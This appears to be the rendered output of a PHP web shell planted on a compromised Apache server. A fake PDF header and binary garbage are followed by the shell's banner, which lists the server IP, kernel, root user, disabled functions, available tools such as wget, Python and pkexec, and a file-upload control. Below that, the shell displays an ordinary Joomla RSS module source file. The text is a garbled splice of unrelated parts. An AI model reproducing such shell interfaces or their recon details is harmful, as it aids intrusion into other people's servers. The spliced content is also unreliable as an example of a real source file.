%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/old/modules/mod_jw_srfr/includes/elements/ |
Upload File : |
<?php /** * @version 3.9.0 * @package Simple RSS Feed Reader (module) * @author JoomlaWorks - https://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2021 JoomlaWorks Ltd. All rights reserved. * @license GNU/GPL license: https://www.gnu.org/copyleft/gpl.html */ // no direct access defined('_JEXEC') or die('Restricted access'); if (version_compare(JVERSION, '3.5.0', 'ge')) { jimport('joomla.form.formfield'); class JWElement extends JFormField { public function getInput() { $controls = (!empty($this->options['control'])) ? $this->options['control'] : array(); return $this->fetchElement($this->name, $this->value, $this->element, $controls); } public function getLabel() { if (method_exists($this, 'fetchTooltip')) { $controls = (!empty($this->options['control'])) ? $this->options['control'] : array(); return $this->fetchTooltip($this->element['label'], $this->description, $this->element, $controls, $this->element['name'] = ''); } else { return parent::getLabel(); } } public function render($layoutId, $data = array()) { return $this->getInput(); } } } elseif (version_compare(JVERSION, '2.5.0', 'ge')) { jimport('joomla.form.formfield'); class JWElement extends JFormField { public function getInput() { return $this->fetchElement($this->name, $this->value, $this->element, $this->options['control']); } public function getLabel() { if (method_exists($this, 'fetchTooltip')) { return $this->fetchTooltip($this->element['label'], $this->description, $this->element, $this->options['control'], $this->element['name'] = ''); } else { return parent::getLabel(); } } public function render() { return $this->getInput(); } } } else { jimport('joomla.html.parameter.element'); class JWElement extends JElement { } }